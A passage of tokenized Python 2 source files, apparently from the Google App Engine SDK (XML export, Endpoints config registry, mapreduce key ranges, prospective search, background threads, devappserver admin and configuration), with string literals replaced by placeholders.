iteritems ( ) <EOL> for ( name , value ) in values : <EOL> if isinstance ( value , basestring ) : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , name , <EOL> saxutils . escape ( value ) , <EOL> name ) ) <EOL> else : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , name ) ) <EOL> self . depth += <NUM_LIT:1> <EOL> self . indent = '<STR_LIT:U+0020>' * self . depth <EOL> self . write_iterable_as_elements ( value ) <EOL> self . depth -= <NUM_LIT:1> <EOL> self . indent = '<STR_LIT:U+0020>' * self . depth <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , name ) ) <EOL> def write_dict ( self , dictionary ) : <EOL> """<STR_LIT>""" <EOL> if self . xml_style == self . ELEMENT_CENTRIC : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , self . entity_node ) ) <EOL> self . write_iterable_as_elements ( dictionary ) <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , self . entity_node ) ) <EOL> else : <EOL> self . output_stream . write ( '<STR_LIT>' % ( self . indent , self . entity_node ) ) <EOL> for ( name , value ) in dictionary . iteritems ( ) : <EOL> self . output_stream . write ( '<STR_LIT>' % ( name , saxutils . quoteattr ( value ) ) ) <EOL> self . output_stream . write ( '<STR_LIT>' ) <EOL> def finalize_export ( self ) : <EOL> if not self . output_stream : <EOL> return <EOL> for node in reversed ( self . node_list ) : <EOL> self . depth -= <NUM_LIT:1> <EOL> self . output_stream . write ( '<STR_LIT>' % ( '<STR_LIT:U+0020>' * self . depth , node ) ) <EOL> self . output_stream . close ( ) <EOL> self . output_stream = None </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> import logging <EOL> from protorpc import message_types <EOL> from google . appengine . ext . endpoints import api_backend <EOL> from google . appengine . ext . endpoints import api_config <EOL> from google . appengine . ext . endpoints import api_exceptions <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> class ApiConfigRegistry ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . __registered_classes = set ( ) <EOL> self . __api_configs = set ( ) <EOL> self . __api_methods = { } <EOL> def register_spi ( self , config_contents ) : <EOL> """<STR_LIT>""" <EOL> if config_contents is None : <EOL> return <EOL> parsed_config = json . loads ( config_contents ) <EOL> if not self . __register_class ( parsed_config ) : <EOL> return <EOL> self . __api_configs . add ( config_contents ) <EOL> self . __register_methods ( parsed_config ) <EOL> def __register_class ( self , parsed_config ) : <EOL> """<STR_LIT>""" <EOL> methods = parsed_config . get ( '<STR_LIT>' ) <EOL> if not methods : <EOL> return True <EOL> service_class = None <EOL> for method in methods . itervalues ( ) : <EOL> rosy_method = method . get ( '<STR_LIT>' ) <EOL> if rosy_method and '<STR_LIT:.>' in rosy_method : <EOL> method_class = rosy_method . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if service_class is None : <EOL> service_class = method_class <EOL> elif service_class != method_class : <EOL> raise api_config . ApiConfigurationError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( service_class , <EOL> method_class ) ) <EOL> if service_class is not None : <EOL> if service_class in self . __registered_classes : <EOL> return False <EOL> self . __registered_classes . 
add ( service_class ) <EOL> return True <EOL> def __register_methods ( self , parsed_config ) : <EOL> """<STR_LIT>""" <EOL> methods = parsed_config . get ( '<STR_LIT>' ) <EOL> if not methods : <EOL> return <EOL> for method_name , method in methods . iteritems ( ) : <EOL> self . __api_methods [ method_name ] = method . get ( '<STR_LIT>' ) <EOL> def lookup_api_method ( self , api_method_name ) : <EOL> """<STR_LIT>""" <EOL> return self . __api_methods . get ( api_method_name ) <EOL> def all_api_configs ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . __api_configs ) <EOL> class BackendServiceImpl ( api_backend . BackendService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , api_config_registry , app_revision ) : <EOL> """<STR_LIT>""" <EOL> self . __api_config_registry = api_config_registry <EOL> self . __app_revision = app_revision <EOL> @ staticmethod <EOL> def definition_name ( ) : <EOL> """<STR_LIT>""" <EOL> return api_backend . BackendService . definition_name ( ) <EOL> def getApiConfigs ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if request . appRevision and request . appRevision != self . __app_revision : <EOL> raise api_exceptions . BadRequestException ( <EOL> message = '<STR_LIT>' % ( <EOL> self . __app_revision , request . appRevision ) ) <EOL> configs = self . __api_config_registry . all_api_configs ( ) <EOL> return api_backend . ApiConfigList ( items = configs ) <EOL> def logMessages ( self , request ) : <EOL> """<STR_LIT>""" <EOL> Level = api_backend . LogMessagesRequest . LogMessage . Level <EOL> log = logging . getLogger ( __name__ ) <EOL> for message in request . messages : <EOL> level = message . level if message . level is not None else Level . info <EOL> record = logging . LogRecord ( name = __name__ , level = level . number , pathname = '<STR_LIT>' , <EOL> lineno = '<STR_LIT>' , msg = message . message , args = None , <EOL> exc_info = None ) <EOL> log . handle ( record ) <EOL> return message_types . VoidMessage ( ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext import key_range <EOL> from google . appengine . ext . mapreduce import namespace_range <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> class KeyRangesFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def create_from_list ( cls , list_of_key_ranges ) : <EOL> """<STR_LIT>""" <EOL> return _KeyRangesFromList ( list_of_key_ranges ) <EOL> @ classmethod <EOL> def create_from_ns_range ( cls , ns_range ) : <EOL> """<STR_LIT>""" <EOL> return _KeyRangesFromNSRange ( ns_range ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> """<STR_LIT>""" <EOL> if json [ "<STR_LIT:name>" ] in _KEYRANGES_CLASSES : <EOL> return _KEYRANGES_CLASSES [ json [ "<STR_LIT:name>" ] ] . from_json ( json ) <EOL> raise ValueError ( "<STR_LIT>" , json ) <EOL> class KeyRanges ( object ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def to_json ( self ) : <EOL> return { "<STR_LIT:name>" : self . __class__ . __name__ } <EOL> @ classmethod <EOL> def from_json ( cls ) : <EOL> raise NotImplementedError ( ) <EOL> def __eq__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def __str__ ( self ) : <EOL> raise NotImplementedError ( ) <EOL> class _KeyRangesFromList ( KeyRanges ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , list_of_key_ranges ) : <EOL> self . _key_ranges = list_of_key_ranges <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return self . _key_ranges == other . _key_ranges <EOL> def next ( self ) : <EOL> if self . _key_ranges : <EOL> return self . _key_ranges . pop ( ) <EOL> raise StopIteration ( ) <EOL> def __str__ ( self ) : <EOL> if len ( self . _key_ranges ) == <NUM_LIT:1> : <EOL> return "<STR_LIT>" % ( self . _key_ranges [ <NUM_LIT:0> ] ) <EOL> if self . _key_ranges : <EOL> return "<STR_LIT>" % ( self . 
_key_ranges [ <NUM_LIT:0> ] , self . _key_ranges [ - <NUM_LIT:1> ] ) <EOL> return "<STR_LIT>" <EOL> def to_json ( self ) : <EOL> json = super ( _KeyRangesFromList , self ) . to_json ( ) <EOL> json . update ( <EOL> { "<STR_LIT>" : [ kr . to_json ( ) for kr in self . _key_ranges ] } ) <EOL> return json <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> return cls ( <EOL> [ key_range . KeyRange . from_json ( kr ) for kr in json [ "<STR_LIT>" ] ] ) <EOL> class _KeyRangesFromNSRange ( KeyRanges ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ns_range ) : <EOL> """<STR_LIT>""" <EOL> self . _ns_range = ns_range <EOL> if self . _ns_range is not None : <EOL> self . _iter = iter ( self . _ns_range ) <EOL> self . _last_ns = None <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , self . __class__ ) : <EOL> return False <EOL> return self . _ns_range == other . _ns_range <EOL> def __str__ ( self ) : <EOL> return str ( self . _ns_range ) <EOL> def next ( self ) : <EOL> if self . _ns_range is None : <EOL> raise StopIteration ( ) <EOL> self . _last_ns = self . _iter . next ( ) <EOL> if self . _last_ns == self . _ns_range . namespace_end : <EOL> self . _ns_range = None <EOL> return key_range . KeyRange ( namespace = self . _last_ns , <EOL> _app = self . _ns_range . app ) <EOL> def to_json ( self ) : <EOL> json = super ( _KeyRangesFromNSRange , self ) . to_json ( ) <EOL> ns_range = self . _ns_range <EOL> if self . _ns_range is not None and self . _last_ns : <EOL> ns_range = ns_range . with_start_after ( self . _last_ns ) <EOL> if ns_range is not None : <EOL> json . update ( { "<STR_LIT>" : ns_range . to_json_object ( ) } ) <EOL> return json <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> if "<STR_LIT>" in json : <EOL> return cls ( <EOL> namespace_range . NamespaceRange . from_json_object ( json [ "<STR_LIT>" ] ) ) <EOL> else : <EOL> return cls ( None ) <EOL> _KEYRANGES_CLASSES = { <EOL> _KeyRangesFromList . 
__name__ : _KeyRangesFromList , <EOL> _KeyRangesFromNSRange . __name__ : _KeyRangesFromNSRange <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> from . google_imports import datastore <EOL> from . google_imports import datastore_types <EOL> from . google_imports import prospective_search <EOL> from . google_imports import prospective_search_pb <EOL> from . google_imports import entity_pb <EOL> from . import model <EOL> from . import tasklets <EOL> DEFAULT_RESULT_BATCH_SIZE = prospective_search . DEFAULT_RESULT_BATCH_SIZE <EOL> DEFAULT_LEASE_DURATION_SEC = prospective_search . DEFAULT_LEASE_DURATION_SEC <EOL> DEFAULT_LIST_SUBSCRIPTIONS_MAX_RESULTS = prospective_search . DEFAULT_LIST_SUBSCRIPTIONS_MAX_RESULTS <EOL> DEFAULT_LIST_TOPICS_MAX_RESULTS = prospective_search . DEFAULT_LIST_TOPICS_MAX_RESULTS <EOL> Error = prospective_search . Error <EOL> DocumentTypeError = prospective_search . DocumentTypeError <EOL> QuerySyntaxError = prospective_search . QuerySyntaxError <EOL> SchemaError = prospective_search . SchemaError <EOL> SubscriptionDoesNotExist = prospective_search . SubscriptionDoesNotExist <EOL> TopicNotSpecified = prospective_search . TopicNotSpecified <EOL> SubscriptionState = prospective_search . SubscriptionState <EOL> subscription_state_name = prospective_search . subscription_state_name <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> _doc_class = prospective_search_pb . MatchRequest <EOL> _MODEL_TYPE_TO_PYTHON_TYPE = { <EOL> model . StringProperty : str , <EOL> model . IntegerProperty : int , <EOL> model . BooleanProperty : bool , <EOL> model . FloatProperty : float , <EOL> model . 
TextProperty : str , <EOL> } <EOL> def _add_schema_entry ( prop_class , name , schema ) : <EOL> """<STR_LIT>""" <EOL> python_type = _MODEL_TYPE_TO_PYTHON_TYPE . get ( prop_class , None ) <EOL> if not python_type : <EOL> return <EOL> if python_type not in schema : <EOL> schema [ python_type ] = [ name ] <EOL> else : <EOL> schema [ python_type ] . append ( name ) <EOL> def _model_to_entity_schema ( document_class ) : <EOL> """<STR_LIT>""" <EOL> schema = { } <EOL> for name , prop in document_class . _properties . iteritems ( ) : <EOL> _add_schema_entry ( prop . __class__ , name , schema ) <EOL> return schema <EOL> def _get_document_topic ( document_class , topic ) : <EOL> assert issubclass ( document_class , model . Model ) <EOL> if topic : <EOL> return topic <EOL> return document_class . _get_kind ( ) <EOL> def subscribe ( document_class , <EOL> query , <EOL> sub_id , <EOL> schema = None , <EOL> topic = None , <EOL> lease_duration_sec = DEFAULT_LEASE_DURATION_SEC ) : <EOL> """<STR_LIT>""" <EOL> assert schema is None <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> schema = _model_to_entity_schema ( document_class ) <EOL> return prospective_search . subscribe ( <EOL> datastore . Entity , <EOL> query , <EOL> sub_id , <EOL> schema = schema , <EOL> topic = topic , <EOL> lease_duration_sec = lease_duration_sec ) <EOL> def unsubscribe ( document_class , sub_id , topic = None ) : <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> prospective_search . unsubscribe ( datastore . Entity , sub_id , topic = topic ) <EOL> def get_subscription ( document_class , sub_id , topic = None ) : <EOL> """<STR_LIT>""" <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> return prospective_search . get_subscription ( datastore . 
Entity , sub_id , <EOL> topic = topic ) <EOL> def list_subscriptions ( document_class , <EOL> sub_id_start = '<STR_LIT>' , <EOL> topic = None , <EOL> max_results = DEFAULT_LIST_SUBSCRIPTIONS_MAX_RESULTS , <EOL> expires_before = None ) : <EOL> """<STR_LIT>""" <EOL> topic = _get_document_topic ( document_class , topic ) <EOL> return prospective_search . list_subscriptions ( <EOL> datastore . Entity , <EOL> sub_id_start = sub_id_start , <EOL> topic = topic , <EOL> max_results = max_results , <EOL> expires_before = expires_before ) <EOL> list_topics = prospective_search . list_topics <EOL> def match ( document , <EOL> topic = None , <EOL> result_key = None , <EOL> result_relative_url = '<STR_LIT>' , <EOL> result_task_queue = '<STR_LIT:default>' , <EOL> result_batch_size = DEFAULT_RESULT_BATCH_SIZE , <EOL> result_return_document = True ) : <EOL> """<STR_LIT>""" <EOL> topic = _get_document_topic ( document . __class__ , topic ) <EOL> pb = document . _to_pb ( ) <EOL> entity = datastore . Entity ( '<STR_LIT>' ) . FromPb ( pb ) <EOL> return prospective_search . match ( <EOL> entity , <EOL> topic = topic , <EOL> result_key = result_key , <EOL> result_relative_url = result_relative_url , <EOL> result_task_queue = result_task_queue , <EOL> result_batch_size = result_batch_size , <EOL> result_return_document = result_return_document ) <EOL> def get_document ( request ) : <EOL> """<STR_LIT>""" <EOL> doc_class = request . get ( '<STR_LIT>' ) <EOL> if not doc_class : <EOL> return None <EOL> entity = entity_pb . EntityProto ( ) <EOL> entity . ParseFromString ( base64 . urlsafe_b64decode ( <EOL> request . get ( '<STR_LIT>' ) . encode ( '<STR_LIT:utf-8>' ) ) ) <EOL> doc_class = int ( doc_class ) <EOL> ctx = tasklets . get_context ( ) <EOL> adapter = ctx . _conn . adapter <EOL> return adapter . pb_to_entity ( entity ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import sys <EOL> import thread <EOL> import threading <EOL> import traceback <EOL> from google . appengine . api . logservice import logservice <EOL> from google . appengine . runtime import request_environment <EOL> BACKGROUND_REQUEST_ID = '<STR_LIT>' <EOL> class _BackgroundRequest ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _ready_condition = threading . Condition ( ) <EOL> self . _callable_ready = False <EOL> self . _thread_id_ready = False <EOL> def ProvideCallable ( self , target , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> with self . _ready_condition : <EOL> self . _target = target <EOL> self . _args = args <EOL> self . _kwargs = kwargs <EOL> self . _callable_ready = True <EOL> self . _ready_condition . notify ( ) <EOL> while not self . _thread_id_ready : <EOL> self . _ready_condition . wait ( ) <EOL> return self . _thread_id <EOL> def WaitForCallable ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . _ready_condition : <EOL> self . _thread_id = thread . get_ident ( ) <EOL> self . _thread_id_ready = True <EOL> self . _ready_condition . notify ( ) <EOL> while not self . _callable_ready : <EOL> self . _ready_condition . wait ( ) <EOL> return self . _target , self . _args , self . _kwargs <EOL> class _BackgroundRequestsContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _requests = { } <EOL> self . _lock = threading . Lock ( ) <EOL> def _GetOrAddRequest ( self , request_id ) : <EOL> with self . _lock : <EOL> if request_id in self . _requests : <EOL> return self . _requests [ request_id ] <EOL> else : <EOL> request = _BackgroundRequest ( ) <EOL> self . _requests [ request_id ] = request <EOL> return request <EOL> def _RemoveRequest ( self , request_id ) : <EOL> with self . _lock : <EOL> del self . 
_requests [ request_id ] <EOL> def EnqueueBackgroundThread ( self , request_id , target , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = self . _GetOrAddRequest ( request_id ) <EOL> return request . ProvideCallable ( target , args , kwargs ) <EOL> def RunBackgroundThread ( self , request_id ) : <EOL> """<STR_LIT>""" <EOL> request = self . _GetOrAddRequest ( request_id ) <EOL> target , args , kwargs = request . WaitForCallable ( ) <EOL> self . _RemoveRequest ( request_id ) <EOL> target ( * args , ** kwargs ) <EOL> _pending_background_threads = _BackgroundRequestsContainer ( ) <EOL> def EnqueueBackgroundThread ( request_id , target , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _pending_background_threads . EnqueueBackgroundThread ( <EOL> request_id , target , args , kwargs ) <EOL> def Handle ( environ ) : <EOL> """<STR_LIT>""" <EOL> error = logservice . LogsBuffer ( ) <EOL> request_environment . current_request . Init ( error , environ ) <EOL> response = { '<STR_LIT:error>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> try : <EOL> request_id = environ [ BACKGROUND_REQUEST_ID ] <EOL> _pending_background_threads . RunBackgroundThread ( request_id ) <EOL> return response <EOL> except : <EOL> exception = sys . exc_info ( ) <EOL> tb = exception [ <NUM_LIT:2> ] . tb_next <EOL> if tb : <EOL> tb = tb . tb_next <EOL> message = '<STR_LIT>' . join ( traceback . format_exception ( exception [ <NUM_LIT:0> ] , exception [ <NUM_LIT:1> ] , <EOL> tb ) ) <EOL> logging . error ( message ) <EOL> response [ '<STR_LIT>' ] = <NUM_LIT> <EOL> response [ '<STR_LIT:error>' ] = <NUM_LIT:1> <EOL> return response <EOL> finally : <EOL> request_environment . current_request . Clear ( ) <EOL> response [ '<STR_LIT>' ] = error . parse_logs ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os . path <EOL> import google <EOL> import jinja2 <EOL> import webapp2 <EOL> from google . appengine . tools . devappserver2 . admin import admin_request_handler <EOL> from google . appengine . tools . devappserver2 . admin import blobstore_viewer <EOL> from google . appengine . tools . devappserver2 . admin import console <EOL> from google . appengine . tools . devappserver2 . admin import cron_handler <EOL> from google . appengine . tools . devappserver2 . admin import datastore_indexes_viewer <EOL> from google . appengine . tools . devappserver2 . admin import datastore_stats_handler <EOL> from google . appengine . tools . devappserver2 . admin import datastore_viewer <EOL> from google . appengine . tools . devappserver2 . admin import mail_request_handler <EOL> from google . appengine . tools . devappserver2 . admin import memcache_viewer <EOL> from google . appengine . tools . devappserver2 . admin import quit_handler <EOL> from google . appengine . tools . devappserver2 . admin import search_handler <EOL> from google . appengine . tools . devappserver2 . admin import servers_handler <EOL> from google . appengine . tools . devappserver2 . admin import static_file_handler <EOL> from google . appengine . tools . devappserver2 . admin import taskqueue_queues_handler <EOL> from google . appengine . tools . devappserver2 . admin import taskqueue_tasks_handler <EOL> from google . appengine . tools . devappserver2 . admin import xmpp_request_handler <EOL> from google . appengine . tools . devappserver2 import wsgi_server <EOL> class AdminApplication ( webapp2 . WSGIApplication ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dispatch , configuration ) : <EOL> """<STR_LIT>""" <EOL> super ( AdminApplication , self ) . __init__ ( <EOL> [ ( '<STR_LIT>' , datastore_viewer . DatastoreRequestHandler ) , <EOL> ( '<STR_LIT>' , datastore_viewer . DatastoreEditRequestHandler ) , <EOL> ( '<STR_LIT>' , datastore_viewer . 
DatastoreEditRequestHandler ) , <EOL> ( '<STR_LIT>' , <EOL> datastore_indexes_viewer . DatastoreIndexesViewer ) , <EOL> ( '<STR_LIT>' , datastore_stats_handler . DatastoreStatsHandler ) , <EOL> ( '<STR_LIT>' , console . ConsoleRequestHandler ) , <EOL> ( '<STR_LIT>' , console . ConsoleRequestHandler . restart ) , <EOL> ( '<STR_LIT>' , memcache_viewer . MemcacheViewerRequestHandler ) , <EOL> ( '<STR_LIT>' , blobstore_viewer . BlobstoreRequestHandler ) , <EOL> ( '<STR_LIT>' , blobstore_viewer . BlobRequestHandler ) , <EOL> ( '<STR_LIT>' , taskqueue_queues_handler . TaskQueueQueuesHandler ) , <EOL> ( '<STR_LIT>' , <EOL> taskqueue_tasks_handler . TaskQueueTasksHandler ) , <EOL> ( '<STR_LIT>' , cron_handler . CronHandler ) , <EOL> ( '<STR_LIT>' , xmpp_request_handler . XmppRequestHandler ) , <EOL> ( '<STR_LIT>' , mail_request_handler . MailRequestHandler ) , <EOL> ( '<STR_LIT>' , quit_handler . QuitHandler ) , <EOL> ( '<STR_LIT>' , search_handler . SearchIndexesListHandler ) , <EOL> ( '<STR_LIT>' , search_handler . SearchDocumentHandler ) , <EOL> ( '<STR_LIT>' , search_handler . SearchIndexHandler ) , <EOL> ( '<STR_LIT>' , static_file_handler . StaticFileHandler ) , <EOL> ( '<STR_LIT>' , servers_handler . ServersHandler ) , <EOL> webapp2 . Route ( '<STR_LIT:/>' , <EOL> webapp2 . RedirectHandler , <EOL> defaults = { '<STR_LIT>' : '<STR_LIT>' } ) ] , <EOL> debug = True ) <EOL> self . dispatcher = dispatch <EOL> self . configuration = configuration <EOL> class AdminServer ( wsgi_server . WsgiServer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , dispatch , configuration , xsrf_token_path ) : <EOL> """<STR_LIT>""" <EOL> self . _host = host <EOL> self . _xsrf_token_path = xsrf_token_path <EOL> super ( AdminServer , self ) . __init__ ( ( host , port ) , <EOL> AdminApplication ( dispatch , configuration ) ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> admin_request_handler . AdminRequestHandler . init_xsrf ( self . 
_xsrf_token_path ) <EOL> super ( AdminServer , self ) . start ( ) <EOL> logging . info ( '<STR_LIT>' , self . _host , <EOL> self . port ) <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( AdminServer , self ) . quit ( ) <EOL> console . ConsoleRequestHandler . quit ( ) </s>
<s> """<STR_LIT>""" <EOL> import errno <EOL> import logging <EOL> import os <EOL> import os . path <EOL> import random <EOL> import string <EOL> import threading <EOL> import types <EOL> from google . appengine . api import appinfo <EOL> from google . appengine . api import appinfo_includes <EOL> from google . appengine . api import backendinfo <EOL> from google . appengine . api import dispatchinfo <EOL> from google . appengine . tools . devappserver2 import errors <EOL> NORMALIZED_LIBRARIES_CHANGED = <NUM_LIT:1> <EOL> SKIP_FILES_CHANGED = <NUM_LIT:2> <EOL> HANDLERS_CHANGED = <NUM_LIT:3> <EOL> INBOUND_SERVICES_CHANGED = <NUM_LIT:4> <EOL> ENV_VARIABLES_CHANGED = <NUM_LIT:5> <EOL> ERROR_HANDLERS_CHANGED = <NUM_LIT:6> <EOL> NOBUILD_FILES_CHANGED = <NUM_LIT:7> <EOL> class ServerConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> _IMMUTABLE_PROPERTIES = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:version>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def __init__ ( self , yaml_path ) : <EOL> """<STR_LIT>""" <EOL> self . _yaml_path = yaml_path <EOL> self . _app_info_external = None <EOL> self . _application_root = os . path . realpath ( os . path . dirname ( yaml_path ) ) <EOL> self . _last_failure_message = None <EOL> self . _app_info_external , files_to_check = self . _parse_configuration ( <EOL> self . _yaml_path ) <EOL> self . _mtimes = self . _get_mtimes ( [ self . _yaml_path ] + files_to_check ) <EOL> self . _application = self . _app_info_external . application <EOL> self . _api_version = self . _app_info_external . api_version <EOL> self . _server_name = self . _app_info_external . server <EOL> self . _version = self . _app_info_external . version <EOL> self . _threadsafe = self . _app_info_external . threadsafe <EOL> self . 
_basic_scaling = self . _app_info_external . basic_scaling <EOL> self . _manual_scaling = self . _app_info_external . manual_scaling <EOL> self . _automatic_scaling = self . _app_info_external . automatic_scaling <EOL> self . _runtime = self . _app_info_external . runtime <EOL> if self . _runtime == '<STR_LIT>' : <EOL> logging . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> self . _yaml_path ) <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> @ property <EOL> def application_root ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _application_root <EOL> @ property <EOL> def application ( self ) : <EOL> return self . _application <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _api_version <EOL> @ property <EOL> def server_name ( self ) : <EOL> return self . _server_name or '<STR_LIT:default>' <EOL> @ property <EOL> def major_version ( self ) : <EOL> return self . _version <EOL> @ property <EOL> def version_id ( self ) : <EOL> if self . server_name == '<STR_LIT:default>' : <EOL> return '<STR_LIT>' % ( <EOL> self . major_version , <EOL> self . _minor_version_id ) <EOL> else : <EOL> return '<STR_LIT>' % ( <EOL> self . server_name , <EOL> self . major_version , <EOL> self . _minor_version_id ) <EOL> @ property <EOL> def runtime ( self ) : <EOL> return self . _runtime <EOL> @ property <EOL> def threadsafe ( self ) : <EOL> return self . _threadsafe <EOL> @ property <EOL> def basic_scaling ( self ) : <EOL> return self . _basic_scaling <EOL> @ property <EOL> def manual_scaling ( self ) : <EOL> return self . _manual_scaling <EOL> @ property <EOL> def automatic_scaling ( self ) : <EOL> return self . _automatic_scaling <EOL> @ property <EOL> def normalized_libraries ( self ) : <EOL> return self . _app_info_external . GetNormalizedLibraries ( ) <EOL> @ property <EOL> def skip_files ( self ) : <EOL> return self . 
_app_info_external . skip_files <EOL> @ property <EOL> def nobuild_files ( self ) : <EOL> return self . _app_info_external . nobuild_files <EOL> @ property <EOL> def error_handlers ( self ) : <EOL> return self . _app_info_external . error_handlers <EOL> @ property <EOL> def handlers ( self ) : <EOL> return self . _app_info_external . handlers <EOL> @ property <EOL> def inbound_services ( self ) : <EOL> return self . _app_info_external . inbound_services <EOL> @ property <EOL> def env_variables ( self ) : <EOL> return self . _app_info_external . env_variables <EOL> @ property <EOL> def is_backend ( self ) : <EOL> return False <EOL> def check_for_updates ( self ) : <EOL> """<STR_LIT>""" <EOL> new_mtimes = self . _get_mtimes ( self . _mtimes . keys ( ) ) <EOL> if new_mtimes == self . _mtimes : <EOL> return set ( ) <EOL> try : <EOL> app_info_external , files_to_check = self . _parse_configuration ( <EOL> self . _yaml_path ) <EOL> except Exception , e : <EOL> failure_message = str ( e ) <EOL> if failure_message != self . _last_failure_message : <EOL> logging . error ( '<STR_LIT>' , failure_message ) <EOL> self . _last_failure_message = failure_message <EOL> return set ( ) <EOL> self . _last_failure_message = None <EOL> self . _mtimes = self . _get_mtimes ( [ self . _yaml_path ] + files_to_check ) <EOL> for app_info_attribute , self_attribute in self . _IMMUTABLE_PROPERTIES : <EOL> app_info_value = getattr ( app_info_external , app_info_attribute ) <EOL> self_value = getattr ( self , self_attribute ) <EOL> if ( app_info_value == self_value or <EOL> app_info_value == getattr ( self . _app_info_external , <EOL> app_info_attribute ) ) : <EOL> continue <EOL> if isinstance ( app_info_value , types . StringTypes ) : <EOL> logging . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> app_info_attribute , <EOL> self_value , <EOL> app_info_value ) <EOL> else : <EOL> logging . warning ( '<STR_LIT>' , <EOL> app_info_attribute ) <EOL> changes = set ( ) <EOL> if ( app_info_external . 
GetNormalizedLibraries ( ) != <EOL> self . normalized_libraries ) : <EOL> changes . add ( NORMALIZED_LIBRARIES_CHANGED ) <EOL> if app_info_external . skip_files != self . skip_files : <EOL> changes . add ( SKIP_FILES_CHANGED ) <EOL> if app_info_external . nobuild_files != self . nobuild_files : <EOL> changes . add ( NOBUILD_FILES_CHANGED ) <EOL> if app_info_external . handlers != self . handlers : <EOL> changes . add ( HANDLERS_CHANGED ) <EOL> if app_info_external . inbound_services != self . inbound_services : <EOL> changes . add ( INBOUND_SERVICES_CHANGED ) <EOL> if app_info_external . env_variables != self . env_variables : <EOL> changes . add ( ENV_VARIABLES_CHANGED ) <EOL> if app_info_external . error_handlers != self . error_handlers : <EOL> changes . add ( ERROR_HANDLERS_CHANGED ) <EOL> self . _app_info_external = app_info_external <EOL> if changes : <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> return changes <EOL> @ staticmethod <EOL> def _get_mtimes ( filenames ) : <EOL> filename_to_mtime = { } <EOL> for filename in filenames : <EOL> try : <EOL> filename_to_mtime [ filename ] = os . path . getmtime ( filename ) <EOL> except OSError as e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> return filename_to_mtime <EOL> @ staticmethod <EOL> def _parse_configuration ( configuration_path ) : <EOL> with open ( configuration_path ) as f : 